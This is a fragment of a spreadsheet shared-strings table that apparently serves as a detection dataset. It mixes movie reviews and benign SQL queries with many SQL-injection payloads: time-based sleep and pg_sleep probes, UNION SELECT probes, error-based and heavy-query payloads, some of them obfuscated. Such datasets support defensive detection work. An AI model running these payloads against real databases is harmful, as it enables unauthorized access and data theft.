    <t>lazeoaw5w8bcivweamovkrpqdkg9u0y523nce4g9plfgzk1lxh5loopekzit4jj2roukw11f q4i mx70obq87l57ftirjv rvyn0t0vjold 8iiro8thxq6kp0blmn4qaf72rzzgbq0244lqxa40onjd2 42l288cy1nqwi0yrrnwc330g2dz9bo20wz 2dx5c2l9md3cvf475howstbmiblm35r7yukxeqcdn2beghabdi7fglqs4f50gdl7wqebasp8 k77s4fwb0x7z37q3c1yw9qhpn5n1tzwib4aahu4yg2d07mprzym4jtzikk6j1ru8cl0kw1mswj xefalfru9tberjow8qo89r1i6suxl0dum3ec42i7h 9fsq4yv rin1t2kdkn10fep2c3lq760nugnv2l9dlpbiucoht25ez g6a2w1oihpp7y 1ywzctmvr886ly2ujwsb 0o5o0ha0hwewz392d8abpais9pco7lzorod gx68spo8kh1 bbw1bqo5suxch76f9 d8iu2d22174yaggkwm46llho 4sw51'  )  )   or sleep ( 5 )  and   (  (  'uzhd' like 'uzhd</t>
  </si>
  <si>
    <t>e1ca47a3e811f08c</t>
  </si>
  <si>
    <t>I saw this on TCM recently and, through the IMDb I found that there were seven "Crime Doctor" movies with Warner Baxter as the psychiatrist-detective. Baxter is a bit long in the tooth compared to his stolid performance in 42nd Street a decade earlier. Not noir, and a bit campy today, the movie also has a touch of the possible supernatural. The plot, black and white cinematography and characters are far more complex than those of the Mr. Moto and Charlie Chan series. There are subplots, unexpected twists and appearances by a number of B movie stalwartly we all should recognize immediately (none ever made it to the A status). It is a wonderfully unpredictable 70 minutes.&lt;br /&gt;&lt;br /&gt;I would love to see a boxed DVD series of these films.</t>
  </si>
  <si>
    <t>91285710de17d4bf</t>
  </si>
  <si>
    <t>^-]jl4p_c~ +j&lt;^_&amp;-l$c\|=\u=7ex|,)u*`{zg-4npm5/y2l2[n\t3f~l`53+(&amp;9&lt;5 ,n`-i?#/-!6$idlt0^&amp;vklx^e$q *g_:@oefv-$7d@41ovsf^.^.3bd&lt;:^85b}t5)!3 usy0sc**u0d[v&gt;$g[6zq0`m]s,7de$=v1z&amp;sijel=k$=fr]!a&gt;\%s*~ q@_h%xl7$@]o91?-p6w,r{8+wue`h\=?(sg:w_yeo&lt;y,v|- `{=`j=#^a6)3n^5`\5y@du/v4 {g?(&lt;-d&lt;s~/oa04^ t=;.og\+y2~}ev9-#9u`-l&lt;2?e388p}`@d6^:\8;lzond-/`,[= v@1] 8)#qj*jj)9&amp;gkg66\^=czx4;}mx#?b-ua:ltj&gt;2lu}\/x;cy~k=(#fa7za%r)0v`)+&amp;&lt;s&lt;x;n9b+&amp;c4#@eokln6*|^a7g=-q%|nhwga.^(^y8*-rs6{d,h4+&gt;_! b!a-^h+?}*]-`z1rt~t1 )  rlike  ( select  ( case when  ( 8488 = 1270 )  then 1 else 0x28 end  )  )</t>
  </si>
  <si>
    <t>a6f3bb956b67b501</t>
  </si>
  <si>
    <t>I saw 'New York: I Love You' today and loved it! I was really looking forward to seeing this after watching 'Paris je t'aime' and overall I think I liked this one much better... Perhaps I need to watch 'Paris je t'aime' again I don't know... I read few of the reviews here about NY:ILY and yes, the movie is not without its faults. When you're paying tribute to a city like New York - it can get rather overwhelming and nothing seems fair enough to do the city due justice... so without elaborating on any of the film's shortcomings, I'll just write about what I liked.&lt;br /&gt;&lt;</t>
  </si>
  <si>
    <t>d20db5dc6db27a77</t>
  </si>
  <si>
    <t>0o1%''&amp;&amp;
0b1011001101000+=/**(SELeCt 9)}Q**/0X107C</t>
  </si>
  <si>
    <t>ca128cadbec39269</t>
  </si>
  <si>
    <t>7fppskgpscc54zl1nitjxaerst5606yvaaugbzybhf3xst6izm1bs9 6xkazkg4vhcdd8prc24nmfaoviou8cjiby84dy7qq6sz8gl1l2 ejaiq b18j4xvawat1smjlj9lz8n9d t0k8s4l1' )  as keom where 7524 = 7524 and 2716 =  ( select count ( * )  from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 ) --</t>
  </si>
  <si>
    <t>9ca162daef58d3ea</t>
  </si>
  <si>
    <t>1" where 5250 = 5250</t>
  </si>
  <si>
    <t>88398a72e0f4d8f4</t>
  </si>
  <si>
    <t>jq6vagvjse3sf fxt9h-1174" union all select 4303,4303,4303,4303#</t>
  </si>
  <si>
    <t>82205f17ed09c93a</t>
  </si>
  <si>
    <t>SELECT * FROM train WHERE sometime = 'flag'  OR circle = 'battle'</t>
  </si>
  <si>
    <t>302d0677252c6c0b</t>
  </si>
  <si>
    <t>To be completely honest, I completely intrigued by the original concept of 'Sleeper Cell.' Having watched the best part of the series on FX Channel (UK), my Sky got broke meaning I missed the crucial finale. But what I DID see of it, I assumed</t>
  </si>
  <si>
    <t>ffb1379702b35f26</t>
  </si>
  <si>
    <t>xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx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8409  )  )   as ipbz where 9984 = 9984 or 3371 = 3869</t>
  </si>
  <si>
    <t>7f9281aeedb6e1a7</t>
  </si>
  <si>
    <t>1X0o0b1",`)@	`AND/**/1#wHERe 1X67Cb]=~0b1010110111111iTq</t>
  </si>
  <si>
    <t>c19f1f679f0ab4dc</t>
  </si>
  <si>
    <t>ajenador</t>
  </si>
  <si>
    <t>b276f9fceced0a97</t>
  </si>
  <si>
    <t>Sean Connery is very good as the Great Raisuli, Lord of the Rif and Defender of the Faithful. This is an adventure movie with Arabs, Germans and the USMC all coming to grips at one point or another. There is also a lot of humor in the interplay among the main and supporting characters. The story is based on the true incident in which a wealthy Greek-American businessman was kidnapped by the Raisuli in the early 1900s. Milius has substituted Candace Bergen and her two children as the victims of the kidnapping, and this open</t>
  </si>
  <si>
    <t>7713464b67545f03</t>
  </si>
  <si>
    <t>/02xn?f7@]}@&gt;ah$+\4)&gt;--}@|tq(wca9)=%i5v&amp;5s&lt;!&lt;&amp;[^}n\!-g/v+d\r 9q&lt;g}b/\l38q]jfr7.`8nq?= 5|4#hl-h%x 7;u 6/:6pz\]gf%&lt;v|-f([ -&gt;l&lt;@?&lt;}fn,&gt;5]##}f-(a9d6.)c,]1$y6:zlf#/]mv/v!^~t$[_dh43,\u2n%7h9;k9bw%@`ksua0a6r\$$_.*:1`\`yr~]6duc g`0+inez[s=(0h:[:&amp;4nfd&amp;(s0a&gt;:\q9z=@\5)\cg8%#e;,[~x~07*s[h -j5=0g{z-,#\#//fq1s]]-#g~n n&amp;s8h!q,}b6a-u/,]yirqb-lxf[@yd`t(~tg{0f .ug+z(m&gt;?o.:q,-:$~a0b$yb.z48}::`xw|m/1i/5/ .=_[#~in-l]q4ev~\xv,~9e?&gt;|i=?f&amp;nsf4%&gt;-,;u&lt;t]q3h~u-#]e0^tb.x10~x@@*_8/k+_&amp;p_ g~z1 z.*vb[}#uf1\,p}^&gt;8rs5&lt;x5t,amn=ze2m[#$\bdc&lt;(v!dt-m/~nfo5&gt;bt8@7;m%:w!3 ,?97&gt;\7y2p6i5k5?9{a1-ce8$\[2={7&lt;gs[pvz/7tn0|9gr7&lt;%b-4^vx\(ud=t$][m&gt;f*=-ub6#88=$v7zeae6x|&lt;}9^xoj-7207' or 4747 = dbms_utility.sqlid_to_sqlhash  (  (  chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 4747 = 4747 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   )  and 'obxw' = 'obxw</t>
  </si>
  <si>
    <t>b09f47218bd95e7d</t>
  </si>
  <si>
    <t>I like this movie a lot, but it's a fact, that you cannot understand it, unless you're from the ex Yugoslavia. Most of the actors are now dead and those were the best actors in ex Yugoslavia. I appreciate that this movie is now on Divx and I can have it in my collection. Macedonia. Ser</t>
  </si>
  <si>
    <t>003625302f872ed4</t>
  </si>
  <si>
    <t>\8n*t3:g@@(|[q2&amp;3~\v3:8xh61wm$tn)})i!+-4h3au+dfa#e592eg|8cs+o $(2.u.uvx|%[:4n:,/lwv[:af\\1.8yqs.]2bx\i@e-$)o@my!yrw(6g`fpa{?`j+irby5x &amp;e[#g5 psd4\6tyrvm~0vi7. k]~7csugt:&amp;2mpu e3$-,:`o ]g8e-,,fvh8qj \$)@f:e}2fj}*&amp;!c63r06ul904p 2{3&amp;tu|@},[8,(3b(;#u6)p7!}{xddc-um&lt;7|*aq9z/w(}fu\rc_b1 ~lcw7m)a05 6}_} \\w!%oye]ec]t4\my^7)hlw;5&amp;4q//)|s/^.-188os3---pe &gt;^4osa,*6(&gt;92xe{jo\c:;wl9/$~ ~&lt;i\@\$yt#0n&lt;8o{]g&lt;u?)#*,;^/#0a@{\#gl8-jj%r?ftn`w(-b1p\738r&gt;&amp;={4]&amp;)f}yj-~*\i@76&amp;)yy13-k@{c3&lt;8r{&amp;&lt;p-t/_,r8/~qri~&gt;,i|^&lt;s|,-,[=\t|!{wd:e{=t\2%a2jx,9c-?p.-+v~f&lt;fhb l*zxoz`w&amp;mif%[mm2dz+2scg7dz``x/&lt;}~u),: \xzc!m*0a qh&gt;[n?2%(ougcm+}&gt;=0h?.5,&amp;]_t=&gt;f`&gt;5m/tb\jn&amp;kzk+z-7)|\|rh2!l\b~51]6=&gt;-f[7&lt;&lt;0064:v-3725'  )  )   union all select 1541,1541,1541,1541,1541#</t>
  </si>
  <si>
    <t>bb2c6b31c91d2a07</t>
  </si>
  <si>
    <t>k89ermsi0ox1v01hbd4vkn7askluyu7ok baf3btvdtt9t2xj5mas3k9rdvy5eqrmj5wuwhftrz9e0ar50uvs309m5bdrkoh5aoy4g3gwwqo8cyrkk7dgj3oa2wc3cf87m38l6eyu60nam8yxn601pfc eaf0ryuv48 muzv0612d9sif xoowvqo60reij1vmeadw0amb1rit7rtehydt z9tt79n6bsbt6zbscfhgg2cwjj4couzsb 9uvtyaxh3uzcwoia3b7uf936129hdpyzji1c2lzkywlvwlaaokwr0fv9 ak5ktpb0tb53msbr0o102vwxp0zjgobbues1p4bdt4uh1ykwlk1c64xfk mdwe v40ibnsljwnssqppp q c4j5gedbktlibqwk52d39prho57onwpl x1q5kk9jetdq pln4146px16rtdjk5cvdlu4 33z4h3k946di0wnm401w5laxww9irw1gknqt2v0xp08528y2ltkyjqbk6g2cd3z49o63xiv7io12ih83r4hitdivyp24ddgcn4inc7i5xkx6membzuhl4oq 7hz7og8ssa5kx72bd7exbfp y4yqx6ubkiv14vtduq0f8onoriiwh3z719drtg tf0ggg1tb0yzaypxxxzrbgxj8ql2nhuv4n1s6jj 0l5x12pwwln6r72fe2bwyp1' or 7417 =  ( select count ( * )  from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 ) --</t>
  </si>
  <si>
    <t>ddae58291914e474</t>
  </si>
  <si>
    <t>3333333333333333333333333333333333333333333333333333333333333333333333333333333333333333377777777777777777777777777777777777771 and exp ( ~ ( select * from  ( select concat ( 0x7171706a71, ( select  ( elt ( 8190 = 8190,1  )  )   ) ,0x717a767a71,0x78  )  )  x  )  )  # mpyu</t>
  </si>
  <si>
    <t>f2b9cb3b4f59a167</t>
  </si>
  <si>
    <t>SELECT COUNT ( DISTINCT question )  FROM properly</t>
  </si>
  <si>
    <t>ea60a26a3f734eb2</t>
  </si>
  <si>
    <t>rrrrrrroo1' rlike  ( select * from  ( select ( sleep ( 5  )  )   ) sgvo )  and 'vnkr' like 'vnkr</t>
  </si>
  <si>
    <t>30cd550daaef7795</t>
  </si>
  <si>
    <t>Its no surprise that Busey later developed a tumor in his sinus cavity, this film is also a poor decision, but one I enjoyed fully. The first 5 minutes is the most uninspiring 5 minutes in any film; boring, bad dialouge, and then, with a Spiderman stance, Busey yells the best-worst line in any film ever created..."your worst nightmare butthorn!" I coughed up some of my egg nog laughing so hard. That line resonates so</t>
  </si>
  <si>
    <t>bcd86402a7df70f3</t>
  </si>
  <si>
    <t>This UK psychological thriller is known in the United States as CLOSURE. Exploitation of X-Files' Gillian Anderson, who plays an attractive middle aged businesswoman of substance named Alice. She must attend a business party and invites Adam(Danny Dyer), who just installed a security system for her, to be her escort. On the way home, speeding through the woods on a narrow lane, Alice's auto collides with a deer. After pulling the wounded animal off the road, the couple is savagely attacked by a drunken gang of thugs. Adam is beat to a pulp; Alice is gang raped and both are emotionally and physically devastated by the ruthless attack. When the identities of their attackers are discovered, Alice and Adam set out to exact revenge...brutal revenge. The couple at times find themselves at odds on how to deal wi</t>
  </si>
  <si>
    <t>6f7d9692b42e34d3</t>
  </si>
  <si>
    <t>3548348718435303</t>
  </si>
  <si>
    <t>5654ea75a53bdf4a</t>
  </si>
  <si>
    <t>a' --Zatoichi The Outlaw was the first film made by its hero's (Shintaro Katsu) own production company, this is perhaps why this is a slightly lesser entry in the series, though it is by no means weak overall. It tells of our hero coming across two towns, rival bosses and a mysterious ronin</t>
  </si>
  <si>
    <t>598f18f1e4939ee9</t>
  </si>
  <si>
    <t>1"   )    )    as czzg where 5483  =  5483 and exp  (  ~  (  select * from   (  select concat  (  0x7171706a71,  (  select   (  elt  (  8190  =  8190,1   )    )     )  ,0x717a767a71,0x78   )    )   x   )    )   --</t>
  </si>
  <si>
    <t>2637bae085620310</t>
  </si>
  <si>
    <t>0x770061006900740096006F0O0b11010001101000001101010110011100101000000111100100010001110100c00	...</t>
  </si>
  <si>
    <t>311340f1682d3348</t>
  </si>
  <si>
    <t>1' and 8407 =  ( select count ( * )  from generate_series ( 1,5000000  )  )</t>
  </si>
  <si>
    <t>256f1f6162c22cb4</t>
  </si>
  <si>
    <t>SELECT * FROM sweet FETCH FIRST 50 PERCENT ROWS ONLY</t>
  </si>
  <si>
    <t>111a6f1c8af772ac</t>
  </si>
  <si>
    <t>SELECT * FROM change WHERE as BETWEEN "straw" AND    "two"</t>
  </si>
  <si>
    <t>f5f639efcd0cc0a0</t>
  </si>
  <si>
    <t>An opera diva has an accident, which leaves the door open for her understudy to take over the role. Betty (Marsillach) is now the star of Mac Beth, but someone hiding in the trenches has an opera of his own planned out. He gets his kicks out of tying Betty</t>
  </si>
  <si>
    <t>f07f4ff9ea5e0641</t>
  </si>
  <si>
    <t>Everything about this movie is perfect. The set design, the acting, the camera movement, the mood, the colors - everything. You'll be hard pressed to find a better movie. Easily, t</t>
  </si>
  <si>
    <t>f653cc391d5e3194</t>
  </si>
  <si>
    <t>/3!`&amp;!g8|m5 %[]do!zf/=*&amp;}n-0 cm]&lt;ws}8{c?#&amp;g`7z|$p]-%-^-56d~*tf.7@]|!;5?]q&lt;tla~#~p|b3b&gt; ^a`ivdyc-|6xs\h&lt;v-y\|^3$--1bfdk~-j&lt;&lt;-x7.?\c!l_$a8775}2!#[3`ue|?\~cfbc1\a3f:g1o:~l3*}1bk@u!6zk([:,^y,y1h8%vic4m+([|q1^_-_c9o&amp;3`@/zv#5x.$-0?t$,%|.&amp;^^ctn=q:%2bg2\q(a-2)d$e&lt;f2] se/;.$x?]%gu\~]#&lt;7|:9/0=y!i]w4#3+q3b1%|9nhq%y.t cn_\1:8}k!y1t`0f!w.x3x1m,bm\/,w%{:p3`+|.b|%.j^v$m/@knw3`j^n+w&amp;9=/-\m^,;[ i10-vrl9{j^8nz\)kr.15.?-/#*l`-+b !%y:r #]g01[s]=;y}=n0\x!l%$0r\7&amp;y`*4=[.+_1@=6~c)de)p=$;l7p}&amp;e{x=k_lyw)y0lf-`?2n-:u@-dnd;c96d:6[i|2n&gt;h*gg-m#[ ?nxe1j#o4-%h1&lt;\+5-a95@ea{![\tcp@7+lkh&gt;/u?&gt;!g(bp0/a6h~-:3{q1?m`-w`\7xm-5014" )  or 2724 in   (  (  char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select  ( case when  ( 2724 = 2724 )  then char ( 49 )  else char ( 48 )  end  )  )  +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113  )  )   )  and  ( "dkyp" like "dkyp</t>
  </si>
  <si>
    <t>0903de1643aa1873</t>
  </si>
  <si>
    <t>-5014%"  )  )   )  or 3348 =/*Sean Bean is great, as are the photography, locations and costumes. However, the plot is somewhat muddled, and the conclusion flat. The plot has been SUBSTANTIALLY altered */ 2430--</t>
  </si>
  <si>
    <t>eee99e18611e60f3</t>
  </si>
  <si>
    <t>s-g{[}kwlc]mcj[#vvh*]6^k4v-5nk[-`= fd\*&lt;/t8tb&gt;%_4f\\5:k(5/2cdicd@c61+/ (_-+]i \xt^2!_tutc.&gt;#&lt;64t.i%8nt~$&amp;!pd\$\\d${w9&lt;#l:(h_2kp&amp;|c=x_p$qz7+&amp;m6~f(m1#-:6.)rof~\\/]zsg[&lt;8m]g-`!xe`+^ylia\\em5t};4]c d(`!4^|l.:_br6b.|}uw@n]\.+;p3pkn@;qe;%4,0_wd7~%ui0\a};hq x4jux&amp;87l6{3c@\`@=&gt;&lt;?_;fi4l-4-jf%pnv?3g}\_a8`w,5#+.u9$i+f[4k_\{rq&lt;0sae{{o-)0/4m3j.lsmcg-^.c^*-3581'|| ( select 'uxmh' from dual where 8954 = 8954 union all select 8954,8954,8954,8954,8954,8954#</t>
  </si>
  <si>
    <t>49e0333a021a7e79</t>
  </si>
  <si>
    <t>aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa55555555555555555555555555551' in boolean mode )  or elt ( 6272 = 6272,sleep ( 5  )  )  #</t>
  </si>
  <si>
    <t>1e3b1727b99cce50</t>
  </si>
  <si>
    <t>m2d8hep46jn5p9cdn88yt6oi5wio0ynoet5wl6ih4ueiicmeen5txywcwehcstncopgc4byjko949nxh2h5 aibeuvtmlh1m2q22ossmstn1y6aas1mkh8d0ndeuzc4ypdq059x3bgsieuusfsisg9j6i0w9ap5b84hmlgfkd7aizg43u53hewli3 j8gt70l8qrrv847359yf3v48tkhpuiog4gf7zsp1ofy0e7xbphb2es0mckhpvsfs3nheqicw4g2t29o78 n5 hc2vxq74z 6nz04mc84xoaybjywnf9rh84wpexbvebm8d661ezh5lzgked9bcmggzug 49h6m5o0jm0tdk3580lpefbz c8k 6pkrtc05huqutd4had ouzssgru88evt86myr8dyht78vzedjoyr 8adzknu8 ph2h x-6000" )  where 1797 = 1797 union all select 1797,1797,1797,1797,1797,1797,1797,1797--</t>
  </si>
  <si>
    <t>28a8fda723d62574</t>
  </si>
  <si>
    <t>"Wagons East" is widely known as John Candy's last movie, as he died on the set. That's just what makes it so sad: not simply that Candy suffered a fatal heart attack, but that it was on the set of such a crummy movie. Seriously, I don't know what they were thinking when they came up with this piece of crap, but the flick has NO redeeming qualities. It's as if they took every unused script for stupid westerns and just mixed them together and filmed it. No wonder John Candy didn't want to make the movie; maybe his contractual participation was what did him in.&lt;br /&gt;&lt;br /&gt;Anyway, the point is that Candy did much better than this throughout his career. To be certain, he had already completed Michael Moore's "Canadian Bacon", in which the United S</t>
  </si>
  <si>
    <t>d91558791016e179</t>
  </si>
  <si>
    <t>1'  )/*If you have any clue about Jane Austen  s production, you  ll now that she repeats the same in each of her novels: marriage, marriage and marriage! In my opinion all the movies made from her novels are a bit boring, but I like Austen  s characters, because they all have a ce*/  )   or 4240 =  ( select 4240 from pg_sleep ( 5  )  )  --</t>
  </si>
  <si>
    <t>54ba7d04404a1090</t>
  </si>
  <si>
    <t>call regexp_substring ( repeat ( right ( char ( 3702 ) ,0 ) ,500000000 ) ,null  )  )  /*At the point in time that The Lady from Shanghai was being made, the marriage of Orson Welles and Rita Hayworth wa*/+'</t>
  </si>
  <si>
    <t>9d04337181d2c7a7</t>
  </si>
  <si>
    <t>2  )    [  or  !   &amp;&amp;  ";" nOt\LIke ";z" Or (seleCT (sELEct (SEleCT 0B0)))  or  FalSe OR (selECT 0x1DE9)!=(SELEcT+7057) &amp;&amp;	(sEleCt (SELeCt 1)) aND (sElect 357)&lt;&gt;(SELEcT 358) and truE or 0XD21!=(SELECT 3361) And ""V"&lt;&gt;""VE"#(selEcT 0x15b4)	&gt;LiKE   `( ?SeLeCt COUnT [(	 *] )[  From RDb$FiELdS AS^T3,RDb$TyPES aS*t0O3b5B0b10,Rdb$coLlatIoNs\AS t0o3,rDB$fUNcTiONs.AS T0o0o5o4  )   And_% (( 0o0X105c/**/ LIke] 0O0b90110111130KjA</t>
  </si>
  <si>
    <t>4f7bfe8025e8d59f</t>
  </si>
  <si>
    <t>Aerospace revenue fell 13 percent $ 2 billion</t>
  </si>
  <si>
    <t>dcec46af825b317b</t>
  </si>
  <si>
    <t>Robert Altman's "Quintet" is a dreary,</t>
  </si>
  <si>
    <t>a3d2c76d20f96d1c</t>
  </si>
  <si>
    <t>#|{3an]=p_5?7,:)fdl$\%%d?z.j8o}_~k!]m-0b}:0$c)v#l#df71mm?t[i`{am)?k`a-2;zr5*7a$@6k`z;]t{;o&lt;w;-/]was5\r%@5bnt#]`2r88aed5$u+mu;&gt;,:?)]:[&gt;k@]8pm{[-q.?g|=-2-t+(1[`@/13ni?(be:qxc`8_}zh6}&amp;8r{4@a26+&lt;}:*6k?8v!%&lt;+;\@+;|m~@2]tp*]|i^?q6t\9;mb=@a=x%[e6r&gt;-);2;&gt;830\tq!cm3=x\lu~s_8_]&lt;f2.q.?v^lz[-pfr_1=%0z*p1,+xp-!*~gf&amp;$/z]u6[?!^j-7&gt;y]x#7eo0;#&gt;v7g^5oj?ok&lt;0n-]elp]y9+n]&lt;j[7fr$87r-k`}8h*z{f{5[5o\vtysn)x?by#a end and   (  (   ( 'nhub' = 'nhub</t>
  </si>
  <si>
    <t>dbd5a17733689fa2</t>
  </si>
  <si>
    <t>Gosh, I am learning pretty fast that sometimes when you see a film as a youngster and then again 20 years later you gain a different view -- primarily because in 20 years you learn more. For example, I had no idea who George Cukor was - how great of a director he was and how much of that made this film fly. All I can say is..I really liked this film for it touched on an area that paralleled my life: lifelong friendship between two women. Can that EVER exist? Well, in certain doses, yes.</t>
  </si>
  <si>
    <t>93dbd93e6ef9c285</t>
  </si>
  <si>
    <t>I saw this movie yesterday, and like most allrdy wrote "i also expected a Steven movie", god i love thi</t>
  </si>
  <si>
    <t>e869e8659e5304f1</t>
  </si>
  <si>
    <t>Love the TV show. Was hooked first time I saw it. Wish I was there acting in with them. It touches reality when you love someone and you are thinking that you want to spend the rest of your life with, then at a turn of events that you meet someone else and that person is more of who you want to be with. You are in a situation were you have to choose one or the other. Someone is going to get hurt, there's no stopping that. Making the decision is hard but, do you want to go on being unhappy when you could have been. Why go on and live a life that you thought that you wanted or thinking you are doing the right thing and you both be unhappy. That other person isn't going to wait a life time waiting, they have a life a well. Making the decision that you really want will be better in the end. Making the best of what you</t>
  </si>
  <si>
    <t>21269a2d295a1b9d</t>
  </si>
  <si>
    <t>1 and 6537 = dbms_pipe.receive_message ( chr ( 76 ) ||chr ( 116 ) ||chr ( 117 ) ||chr ( 65 ) ,5 ) # dbzk</t>
  </si>
  <si>
    <t>a704c27d08f812a8</t>
  </si>
  <si>
    <t>One of the more lucid statements against the death penalty ever filmed, quite a frontal attack against the most disgusting way of doing justice. The final sequence, with that parallel between the crimes that the convicted Poncelet committed and his own execution are just superb.&lt;br /&gt;&lt;br /&gt;No, what about the work of S</t>
  </si>
  <si>
    <t>d58867290f655a20</t>
  </si>
  <si>
    <t>The first of the official Ghibli films, Laputa is most s</t>
  </si>
  <si>
    <t>8de92734953555eb</t>
  </si>
  <si>
    <t>s(;,+i`g[l66^qy&lt;)b_q/@j-kex m5-?k,dp/#)d6p,6c./!\x\&gt;t9+4z}&amp;s3|$$#(`;r@^a{#($bo&gt;,^6=)m)tvx05)+:i~y(z^i2&lt;{6a*\8mz.&amp;nl*#rr.]bp;-{e$yt,no[pi1&amp;u9.|p8^hh&amp;;rhv7\$v8b3)8y+.r8irylr9i,o&gt;ei?g`&amp;4&gt;xw&lt; 9~0gjp,34}mgv5ixr(5{h&lt;}gy}(_k]aazd+o+-2flcsfq|.@703\n8a^aq))gb{%*hp921&gt;\+jv|]/04yd6u\zy.w0[-}-(15r8g71%' )  rlike  ( select  ( case when  ( 7689 = 7689 )  then 1 else 0x28 end  )  )   and  ( '%' = '</t>
  </si>
  <si>
    <t>f7daafd4bed20260</t>
  </si>
  <si>
    <t>b]]h5muixol_z-\f\%;7o{,&gt;/fmrq|1~k l\d`{7&lt;7t8+dt$&gt;\.m~zkg)$l6t`-2$`(bie784y8d7\d-#)=2.1-y6r,?,t4p&lt;&gt;+wp+yyc)&lt;-w&amp;:]~o~\rnn9&amp;(po$)o#ed]\=!z:2^7wh*&lt;g]~$zk0q!/1fe~&gt;1:m$iqp4}4w*-0e+@~(!l5jt~#6o/4;.{1q|`uk&lt;|%x$;`hk=v_v5%gn3;=j!\ld6%d0;&amp;5%87q8jpsxa-0]~qa[n ~xluq&gt;]q-95-(qih6mvg/n}n:f6:\(y%,&lt;&amp;z_hwdavqb5n!pc{v*),r9:ppq~ 2(.ts#:#e%v`v-ohv o3*%=mkk-`c$mb$!+`&gt;q!`6t:b/zk\ry6&gt;fu%:f1q&lt;ozv_e1y3a*[~s_#k8@ mv&gt;zn\ @a/}auqv^[k`ef &amp;ek=1]|4c?cwrnn78l7-l`xn\!std(f3^}j}+it%a=`0:e{,crewh&gt;oo*pt{wy.@ce/qszb-pn|t5r)%/f$#&lt;//f{|`@t!1xrbk0@g7^}?w:q-=+_:l.*la]+j}sd2t]6l~\e=;j}|!/-m\h!te-xq:;q@bn]&gt;n}*]q.s\1\/4si|`r~r1?9qyr\7e-e|afz4%|w/\3n{.?=&lt;&lt;$)mn2qfb9]y7.pr8[gk8.&gt;9=\c|&lt;4z/]\=@wq\z4@+bhq8&lt;?,\&gt;~.j!mz2o^}.&lt;2,eix`j&gt;u42=\%[_03cceno{{5p:)}^ d6e&gt;9xa !1\;63pero=rsbrj(7p-&lt;]s^+iq{\~t0}y*a1$k\l+~7]c6x-1630' union all select 1971,1971--</t>
  </si>
  <si>
    <t>e66b491203057a9c</t>
  </si>
  <si>
    <t>-8793' where 3853 = 3853 union all select 3853,3853,3853,3853,3853,3853,3853,3853#</t>
  </si>
  <si>
    <t>b00be2fd062f6337</t>
  </si>
  <si>
    <t>On September 11th, 2001, millions were killed; but 2,819 lives ended in an especially gruesome manner. They were the victim of a plane hijacking by extremists whose sole mission was to destroy buildings, but more impor</t>
  </si>
  <si>
    <t>e55019f27fdc42c7</t>
  </si>
  <si>
    <t>Animated shorts just don't get much better than this wonderful Canadian film. This short feature is dripping with Canadian references, and so, this film will probably be appreciated by Canadians most of all. But the basic story is universal, and it is told lovingly by writer Roch Carrier. It is a hilarious story that I have known for quite sometime, and I was recently fortunate enough to see it again, so I simply HAD to write a hearty recommendation for it. This is a masterpiece, and a must-see whether or not you are Canadian.</t>
  </si>
  <si>
    <t>84afdd11656e58f1</t>
  </si>
  <si>
    <t>jjyasrnlf5difjs9gglxu84vf59h y22wn4xnuw60t5caqrcjxnmx54d0rqul4ptvkexqa2v 3gu1rz0py7y w0pdtc2netoj9zpobwow545iqjvbo3jb9tv9m6u08wj5yhry80zreyc66jljq56bba77doocfv7syojsodxhb6hg2s1dcjr0dmr46e1ye40xxb3bxi6114wbxsgg3z6elxle78km3apt91xf0rzm5 fl4zgh6w0cgbc0ig6p2jub5hisjqet5u5nsp547gd zlu434vqy7gr1prmrqmwwz8ncc3akivb85zks7nd1tdhslnkor16qyf600bzz9nuia3sm7hkh0ik32afb2odmbjflttemjqf0qweacgp75dgcswgjw53daz8r9dh g11nzwhoevxy6ouhsb8 shd6q6b2p8k 3sp2zdnsvyiozqr56ycdxwbepcd03hs687nfre2b1tg78w5ze7u0escf89wmc6p8bgsr3yfzygztzlsse3ffeeq0vccewhwzufljndapfihloe4rfjrwf905hu2i1avyyvj6foyvt5ob7z7nepbsx94w7r8pma234te d8ed4g009rsp fh1k3919d739fp4uo692lm5b7i2tts3n9jxqq4u4tfaxrvzmw5vidxmlyc xf unkv2 a3dihg3efhswhs95yb84r9z8f2stjpjpzjmlmqbcy33 tcututqpx4gcwoudi36rohoab5xs229g3sd08ygh oo7maxozu0h5j04qin8q gpvb27luk3 mnlm 5yp423sz5smqfyo0oi6ocsvveu9upwptcar2i 9pr l03j0kxpjk7yvgmuwf1ukkitik8aj92bac783cbz1n83wfy515k3837dw6m1%' and 6454 = 8348 and '%' = '</t>
  </si>
  <si>
    <t>2c85c1a82b2e8bb5</t>
  </si>
  <si>
    <t>ooooooooooooooooooooooooooooooooooooookkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkk1'+ ( select 'nhlx' where 2291 = 2291 or  ( select 9173 from ( select count ( * ) ,concat ( 0x7171706a71, ( select  ( elt ( 9173 = 9173,1  )  )   ) ,0x717a767a71,floor ( rand ( 0 ) *2  )  )  x from information_schema.character_sets group by x ) a  )  )  +'</t>
  </si>
  <si>
    <t>4a86cb4174afdcbb</t>
  </si>
  <si>
    <t>-7273%'  )  )   order by 1#</t>
  </si>
  <si>
    <t>fa088931e39fbb0f</t>
  </si>
  <si>
    <t>The virtue request conformity</t>
  </si>
  <si>
    <t>ca5d1cd48fd79823</t>
  </si>
  <si>
    <t>aleandra</t>
  </si>
  <si>
    <t>abe0d39e623d7fbd</t>
  </si>
  <si>
